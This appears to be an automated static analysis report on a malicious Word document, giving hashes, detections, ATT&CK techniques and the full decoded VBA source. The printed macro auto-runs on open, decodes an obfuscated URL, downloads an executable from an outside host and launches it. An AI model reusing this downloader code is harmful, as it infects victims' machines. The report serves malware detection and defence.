Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b677f0fcc8c39c6c…

MALICIOUS

Office (OLE)

Size: 111.0 KB
Created: 2015-07-08 15:41:00
Authoring application: Microsoft Office Word
First seen: 2015-09-19
MD5: 14fad0cfcecadf7e6cd8ca43a733cd50
SHA-1: 90a8f5a965de627d5b75387dc644bda297cc0b23
SHA-256: b677f0fcc8c39c6ce97b3da7db86b4a9e8ca7bac850a04b7f3d85716e52059bf
Risk Score: 278

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1105 Ingress Tool Transfer
  • T1204.002 Malicious File

The sample contains VBA macros that utilize the URLDownloadToFileA API to download a file from a remote location. It also references ShellExecuteA, indicating an intent to execute the downloaded content. The ClamAV detection name 'Doc.Downloader.Bartalex-6755229-0' further supports its role as a downloader.

Heuristics 9

  • ClamAV: Doc.Downloader.Bartalex-6755229-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Bartalex-6755229-0
  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    Private Declare Function NbZquxoNdUFnpKnrFBkyXXyHTwPv Lib "urlmon" Alias "URLDownloadToFileA" (ByVal SlKlwqIrOyIOKWnCJLUsnQSz As Long, ByVal FYhWCxxwBmtAQrrGwzrPtXVDsMDuHRB As String, ByVal AooPXkMgLjBNBztLIfOZfbnEFbclJqTjPVpxnSNOMRCvCh As String, ByVal HtJNPHhJoYTIdTKXjRQEqRoAOwNzDeRPJ As Long, ByVal cYvRqvsDGVrsBLGkzSmFApU As Long) As Long
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    NbZquxoNdUFnpKnrFBkyXXyHTwPv 0, gLjBNBztLIfOZfbnEFbclJqTjPVpxnSNOMRCvChHtJNPHhJ("fyf/sfopc0qvldbc0npd/vpzspgffsgnpecvt00;quui"), Environ$("tmp") & "\" & gLjBNBztLIfOZfbnEFbclJqTjPVpxnSNOMRCvChHtJNPHhJ("fyf/sfopc"), 0, 0
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2825 bytes
SHA-256: 84641e9e6a71780b5fe9a28e93f0aaf4543620e854090223cec17baa96b1b3ec
Detection
ClamAV: No threats found
Obfuscation or payload: likely
32 of 54 identifiers look randomly generated (e.g. 'oYTIdTKXjRQEqRoAOwNzDeRPJcYvRqvsDGVrsBLG') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Macro Name: UuUgZspLiGyuGWmHvEcWACjDIQFmu
Private Declare Function GFNGhdrghsDFBDFgbdgF Lib "shell32.dll" Alias "ShellExecuteA" (ByVal efdiSLTxKJZegXxMEpWYtVbpzThUHiEDgMe As Long, ByVal QUuUgZspLiGyuGWmHvEcW As String, ByVal ACjDIQFmuvtyVdkNbZquxoNdUFnpKnrFBkyXXyHTwP As String, ByVal vSlKlwqIrOyIOKWnCJLUsnQSz As String, ByVal FYhWCxxwBmtAQrrGwzrPtXVDsMDuHRBAooPX As String, ByVal kMgLjBNBztLIfOZfbnEFbclJqTj As Long) As Long
Private Declare Function NbZquxoNdUFnpKnrFBkyXXyHTwPv Lib "urlmon" Alias "URLDownloadToFileA" (ByVal SlKlwqIrOyIOKWnCJLUsnQSz As Long, ByVal FYhWCxxwBmtAQrrGwzrPtXVDsMDuHRB As String, ByVal AooPXkMgLjBNBztLIfOZfbnEFbclJqTjPVpxnSNOMRCvCh As String, ByVal HtJNPHhJoYTIdTKXjRQEqRoAOwNzDeRPJ As Long, ByVal cYvRqvsDGVrsBLGkzSmFApU As Long) As Long
Dim oAOwNzDeRPJcYvRqvsDGVr As String, sBLGkzSmFApUefdiSLTxKJ As String, ZegXxMEpWYtVbpzThUHiEDgMeQ As String, vtyVdkNbZquxoNdUFnpKnrFBkyXXy As String, HTwPvSlKlwqIrOyIOKWnCJLUsnQSzFYhWCxxw As String, BmtAQrrGwzrPtXVDsMDuHRBAooPXkM As String, vSlKlwqIrOyIOKWnCJLUsnQSzFYhWCxxwBm As String, tAQrrGwzrPtXVDsMDuHRBAooPXkMgLjBNBztLIfOZfbnEFbcl As String
Private Function gLjBNBztLIfOZfbnEFbclJqTjPVpxnSNOMRCvChHtJNPHhJ(oYTIdTKXjRQEqRoAOwNzDeRPJcYvRqvsDGVrsBLGkzSmFApUe)
    Dim fdiSLTxKJZegXxMEpWYtVbpz, ThUHiEDgMeQUuUgZspLiGyuGWm, HvEcWACjDIQFmuvtyVdkNb
y = Len(oYTIdTKXjRQEqRoAOwNzDeRPJcYvRqvsDGVrsBLGkzSmFApUe)
For x = y To 1 Step -1
     JqTjPVpxnSNOMRCvChHtJNPHhJoYTIdTKXjRQEqRo = Mid(oYTIdTKXjRQEqRoAOwNzDeRPJcYvRqvsDGVrsBLGkzSmFApUe, x, 1)
     AOwNzDeRPJcYvRqvsDGVrsBLGkzSmFApUef = AOwNzDeRPJcYvRqvsDGVrsBLGkzSmFApUef & JqTjPVpxnSNOMRCvChHtJNPHhJoYTIdTKXjRQEqRo
Next
 For ThUHiEDgMeQUuUgZspLiGyuGWm = 1 To Len(AOwNzDeRPJcYvRqvsDGVrsBLGkzSmFApUef)
        fdiSLTxKJZegXxMEpWYtVbpz = Mid(AOwNzDeRPJcYvRqvsDGVrsBLGkzSmFApUef, ThUHiEDgMeQUuUgZspLiGyuGWm, 1)
        HvEcWACjDIQFmuvtyVdkNb = HvEcWACjDIQFmuvtyVdkNb & Chr(Asc(fdiSLTxKJZegXxMEpWYtVbpz) - 1)
    Next
    gLjBNBztLIfOZfbnEFbclJqTjPVpxnSNOMRCvChHtJNPHhJ = HvEcWACjDIQFmuvtyVdkNb
End Function
Private Sub UuUgZspLiGyuGWmHvEcWACjDIQFmu()
NbZquxoNdUFnpKnrFBkyXXyHTwPv 0, gLjBNBztLIfOZfbnEFbclJqTjPVpxnSNOMRCvChHtJNPHhJ("fyf/sfopc0qvldbc0npd/vpzspgffsgnpecvt00;quui"), Environ$("tmp") & "\" & gLjBNBztLIfOZfbnEFbclJqTjPVpxnSNOMRCvChHtJNPHhJ("fyf/sfopc"), 0, 0
GFNGhdrghsDFBDFgbdgF 0, "open", Environ$("tmp") & "\" & gLjBNBztLIfOZfbnEFbclJqTjPVpxnSNOMRCvChHtJNPHhJ("fyf/sfopc"), "", vbNullString, vbNormalFocus
End Sub
Private Sub Document_Open()

UuUgZspLiGyuGWmHvEcWACjDIQFmu
End Sub